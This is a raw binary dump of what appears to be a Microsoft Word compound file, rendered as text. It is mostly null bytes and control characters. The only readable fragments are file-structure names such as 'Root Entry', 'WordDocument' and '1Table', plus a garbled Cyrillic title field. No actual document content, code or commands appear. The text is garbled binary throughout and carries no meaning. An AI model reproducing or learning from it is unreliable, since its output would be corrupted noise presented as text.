0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0þÿ\0\0\x06\x01\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x02ÕÍÕœ.^[\x10“—\b\0+,ù®0\0\0\0ô\0\0\0\f\0\0\0\x01\0\0\0h\0\0\0\x0f\0\0\0p\0\0\0\x05\0\0\0„\0\0\0\x06\0\0\0Œ\0\0\0\x11\0\0\0”\0\0\0\x17\0\0\0œ\0\0\0\v\0\0\0¤\0\0\0\x10\0\0\0¬\0\0\0\x13\0\0\0´\0\0\0\x16\0\0\0¼\0\0\0\r\0\0\0Ä\0\0\0\f\0\0\0Ñ\0\0\0\x02\0\0\0ã\x04\0\0\x1e\0\0\0\f\0\0\0MICROSOFT\0\0\0\x03\0\0\0\x02\0\0\0\x03\0\0\0\x01\0\0\0\x03\0\0\0m\x01\0\0\x03\0\0\0\0\0\f\0\v\0\0\0\0\0\0\0\v\0\0\0\0\0\0\0\v\0\0\0\0\0\0\0\v\0\0\0\0\0\0\0\x1e\x10\0\0\x01\0\0\0\x01\0\0\0\0\f\x10\0\0\x02\0\0\0\x1e\0\0\0	\0\0\0Íàçâàíèå\0\x03\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01\0\0\0\x02\0\0\0\x03\0\0\0\x04\0\0\0\x05\0\0\0\x06\0\0\0\a\0\0\0\b\0\0\0þÿÿÿ
\0\0\0\v\0\0\0\f\0\0\0\r\0\0\0\x0e\0\0\0\x0f\0\0\0\x10\0\0\0þÿÿÿ\x12\0\0\0\x13\0\0\0\x14\0\0\0\x15\0\0\0\x16\0\0\0\x17\0\0\0\x18\0\0\0\x19\0\0\0\x1a\0\0\0^[\0\0\0\x1c\0\0\0\x1d\0\0\0\x1e\0\0\0\x1f\0\0\0 \0\0\0!\0\0\0þÿÿÿ#\0\0\0$\0\0\0%\0\0\0&\0\0\0'\0\0\0(\0\0\0)\0\0\0þÿÿÿ+\0\0\0,\0\0\0-\0\0\0.\0\0\0/\0\0\00\0\0\01\0\0\0þÿÿÿýÿÿÿ4\0\0\05\0\0\0E\0\0\0þÿÿÿ8\0\0\09\0\0\0:\0\0\0;\0\0\0<\0\0\0=\0\0\0>\0\0\0?\0\0\0@\0\0\0A\0\0\0B\0\0\0C\0\0\0D\0\0\0þÿÿÿþÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR\0o\0o\0t\0 \0E\0n\0t\0r\0y\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x16\0\x05\x01ÿÿÿÿÿÿÿÿ\x03\0\0\0\x06	\x02\0\0\0\0\0À\0\0\0\0\0\0F\0\0\0\0\0\0\0\0\0\0\0\00¼‹;JÛÏ\x017\0\0\0\0\x1c\0\0\0\0\0\0D\0a\0t\0a\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
\0\x02\x01ÿÿÿÿÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0	\0\0\0\0\x10\0\0\0\0\0\01\0T\0a\0b\0l\0e\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x0e\0\x02\0\x01\0\0\0ÿÿÿÿÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x11\0\0\0\0!\0\0\0\0\0\0W\0o\0r\0d\0D\0o\0c\0u\0m\0e\0n\0t\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1a\0\x02\x01\x06\0\0\0\x05\0\0\0ÿÿÿÿ\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0